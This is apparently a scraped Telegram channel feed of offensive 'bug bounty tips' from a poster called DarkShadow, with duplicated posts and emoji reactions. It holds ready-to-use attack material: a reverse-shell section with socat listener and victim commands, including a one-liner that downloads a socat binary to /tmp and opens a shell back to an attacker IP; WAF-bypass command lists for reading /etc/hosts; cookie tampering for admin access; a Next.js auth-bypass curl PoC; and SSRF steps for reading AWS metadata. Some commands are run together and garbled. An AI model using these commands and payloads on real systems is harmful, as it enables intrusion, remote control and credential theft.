Recently disclosed hackerone critical bug, which can exploitable under few minutes!
POC:
GET /reports/***.json HTTP/2
Host: hackerone.com
If you all guys interested to know simple and Smart tricks β never forget to react β€οΈ
POC:
GET /reports/***.json HTTP/2
Host: hackerone.com
If you all guys interested to know simple and Smart tricks β never forget to react β€οΈ
β€77π16πΏ11π₯5π2
A simple hunt can flip the whole game!π
While testing a web app, I noticed this suspicious-looking session cookie:
I quickly ran it through Base64 decoding:
Wow π³ β it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
Then replaced the cookie:
BOOM π₯ Instantly, we got admin access!π₯
Follow me ππΌ ...DarkShadow...
While testing a web app, I noticed this suspicious-looking session cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==I quickly ran it through Base64 decoding:
echo "e3VzZXI6ZGFya3NoYWRvdyxyb2xlOnVzZXJ9Cg==" | base64 -d
{user:darkshadow,role:user}
Wow π³ β it's a JSON-style string in plain Base64.
Time to see how deep the rabbit hole goes...
I modified the role from user to admin:
echo "{user:darkshadow,role:admin}" | base64
e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=
Then replaced the cookie:
Cookie: session=e3VzZXI6ZGFya3NoYWRvdyxyb2xlOmFkbWlufQo=BOOM π₯ Instantly, we got admin access!π₯
Follow me ππΌ ...DarkShadow...
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π13π₯10π3
π€«Everyone Let's dive deep into the art of WAF bypass techniques β a must-know skill for every serious bug bounty hunter.β‘
β‘Bypass Series for bug huntersπ
Part-1
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
Follow meππΌ DarkShadow
#Bugbountytips #series
β‘Bypass Series for bug huntersπ
Part-1
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tac /etc/hosts - π§ββοΈ man /etc/hosts - πnl /etc/hosts - π€―less /etc/hosts - π€«more /etc/hosts - πstrings /etc/hosts - πtail /etc/hosts - π
head /etc/hosts -π₯±Follow meππΌ DarkShadow
#Bugbountytips #series
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯~For more Join my New telegram ChannelππΌ https://t.co/9p1yvzluA4 β¨
π₯21β€6π4
This media is not supported in your browser
VIEW IN TELEGRAM
π€£17π6π1
β‘Bypass Series for bug huntersπ
Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
perl -pe '' /etc/hosts
Follow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-2
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
xxd -p /etc/hosts | xxd -p -rxargs -d '\n' -I{} echo {} < /etc/hostsperl -pe '' /etc/hosts
sed '' /etc/hostsawk '{print}' /etc/hostsdd if=/etc/hosts 2>/dev/nullFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯17π6
π₯With the right dork, the whole game changesβrecon becomes domination.π
Dork:
For more followππΌ DarkShadow
#bugbountytips
Dork:
inurl:search.php inurl:sqlQuery inurl:&For more followππΌ DarkShadow
#bugbountytips
π17π₯5β€1π1π³1
π This is wild!
Youβve probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927) β but thereβs another less-known yet similar vulnerability: CVE-2024-51479.
This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.
Proof of Concept (PoC):
This vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.
I found a very cool article explaining everything in detail:
https://gmo-cybersecurity.com/blog/another-nextjs-middleware-bypass-en
Youβve probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927) β but thereβs another less-known yet similar vulnerability: CVE-2024-51479.
This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.
Proof of Concept (PoC):
curl https://target.com/?__nextLocale=/adminThis vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.
I found a very cool article explaining everything in detail:
π8β€5π₯5π3π«‘1
This media is not supported in your browser
VIEW IN TELEGRAM
π New Script Alert β Subdomain Monitoring (Coming Soon!)
from Brut Security
For those whoβve been waiting on a simple and efficient way to monitor subdomains automatically β your wait is almost over. π
Weβve been working on a Bash script that:
β Monitors your target domains every 6 hours
β Uses subfinder, anew, and notify
β Sends actual new subdomains as file attachments directly to your Discord webhook
β Clean, lightweight & made for practical usage in recon and bug bounty
The release isnβt today β dropping next week, but thought Iβd give you all a heads-up.
If youβre into bug hunting, automation, or OSINT β this might be super useful for your workflow.
π Share with your team
β€οΈ React if youβre excited
Letβs get the word out before the launch!
#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
from Brut Security
For those whoβve been waiting on a simple and efficient way to monitor subdomains automatically β your wait is almost over. π
Weβve been working on a Bash script that:
β Monitors your target domains every 6 hours
β Uses subfinder, anew, and notify
β Sends actual new subdomains as file attachments directly to your Discord webhook
β Clean, lightweight & made for practical usage in recon and bug bounty
The release isnβt today β dropping next week, but thought Iβd give you all a heads-up.
If youβre into bug hunting, automation, or OSINT β this might be super useful for your workflow.
π Share with your team
β€οΈ React if youβre excited
Letβs get the word out before the launch!
#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
21β€30π6π₯4π2
API_Hacking_with_Javascript_Checklist.pdf
47.1 MB
API Hacking with Javascript Checklist - 5 things that you should look for in JS files for API hacking.
π₯22β€13
β‘Convert your basic nc reverse shell to a pro interactive shellπ
β‘Bash Series for bug huntersπ
Part-1
Use python to Spawn a TTY shell:
Use this command to use clear command:
Get a sexy shell prompt:
Use those alias for speed up:
To close the shell temporally:
Press control+Z
Use this command to back again session:
Guys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
β‘Bash Series for bug huntersπ
Part-1
Use python to Spawn a TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'Use this command to use clear command:
export TERM=xterm-256colorGet a sexy shell prompt:
PS1='\[\033[01;32m\]\u@\h \[\033[01;34m\]\w\[\033[01;31m\]$\[\033[00m\] 'Use those alias for speed up:
export EDITOR=nano
alias mm=clear
alias ls='ls --color=auto'
alias ll='ls -la --color=auto'
alias grep='grep --color=auto'To close the shell temporally:
Press control+Z
Use this command to back again session:
stty raw -echo; fgGuys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯10πΏ8π5
β‘Bypass Series for bug huntersπ
Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
cat < /etc/hostscat /proc/self/fd/0 < /etc/hostscat /etc/hosts | base64 | base64 -dcat /etc/hosts | string collectcat /etc/hosts | while read line; echo $line; end
echo (cat /etc/hosts)
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π8β€5π₯3
β‘Bash Series for bug huntersπ
Part-2
Stop using directly nc and try with the following command:
Or
Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).
For full interactive keyboard controls, use a socat interactive shell:
On attacker side:
If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>
On victim side (for a full TTY reverse shell):
If socat is not installed on the victim machine, use this one-liner to download a static binary:
to stop socat:
Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-2
Stop using directly nc and try with the following command:
rlwrap -cAr nc -lvnp <port>Or
rlwrap -f . -r nc -lnvp <port>Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).
For full interactive keyboard controls, use a socat interactive shell:
On attacker side:
socat file:tty,raw,echo=0 tcp-listen:<port>If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>
On victim side (for a full TTY reverse shell):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>If socat is not installed on the victim machine, use this one-liner to download a static binary:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>to stop socat:
ps aux | grep socatKill -9 socat <PID>Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯9β€2π1
β‘HackerOne was vulnerable to a critical SSRF that allowed reading AWS metadata β disclosed and rewarded $25,000! π€―
π The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.
POC Steps:
1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click βApplyβ (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata
Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks β donβt forget to react & share β€οΈ
πFollow meππΌ DarkShadow
π The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.
POC Steps:
1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click βApplyβ (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata
Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks β donβt forget to react & share β€οΈ
πFollow meππΌ DarkShadow
π₯28β€10πΏ9π5π«‘2
This is really cool π₯
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
π13π₯2
β‘Bypass Series for bug huntersπ
Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
Guys, what do you think about those WAF bypass techniques I created?
Hold on for the last one β it's really awesome!π
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
rev /etc/hosts | revod -An -c /etc/hosts | tr -d ' 'cat $HOME/../../etc/hostscat ${PWD}/../../../etc/hostsgrep "" /etc/hostscut -c1- /etc/hostspaste /etc/hostsGuys, what do you think about those WAF bypass techniques I created?
Hold on for the last one β it's really awesome!π
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯9β€7π5
β‘Bash Series for bug huntersπ
Part-2
Create multiple folders using one-liner:
This command will create 3 directories (dev, test, prod) at a time.
Creating Multiple Files Efficiently:
File creates like file1.txt, file2.txt file3.txt
Generating Files with Numeric Sequences:
This sequence creates file's:
file01.txt, file02.txt, file03.txt .... To file10.txt
Boost your bug hunting with pro Bash commands β a must for every hacker!
Don't forget to reactπ₯
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-2
Create multiple folders using one-liner:
mkdir {dev,test,prod}This command will create 3 directories (dev, test, prod) at a time.
Creating Multiple Files Efficiently:
touch {file1,file2,file3}.txtFile creates like file1.txt, file2.txt file3.txt
Generating Files with Numeric Sequences:
seq -w 1 10 | xargs -I {} touch file{}.txtThis sequence creates file's:
file01.txt, file02.txt, file03.txt .... To file10.txt
Boost your bug hunting with pro Bash commands β a must for every hacker!
Don't forget to reactπ₯
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯13π4
program-list.json
1.1 MB
πHelpful Websites for Finding Bug Bounty and Vulnerability Disclosure Programs.β‘
Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.
https://disclose.io/programs/
You can also download all programs in JSON format, provided the JSON file.
Don't forget to react π₯
π Follow me ππΌ DarkShadow
#BugBountytips
Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.
https://disclose.io/programs/
You can also download all programs in JSON format, provided the JSON file.
π Follow me ππΌ
#BugBountytips
π₯22π3π€2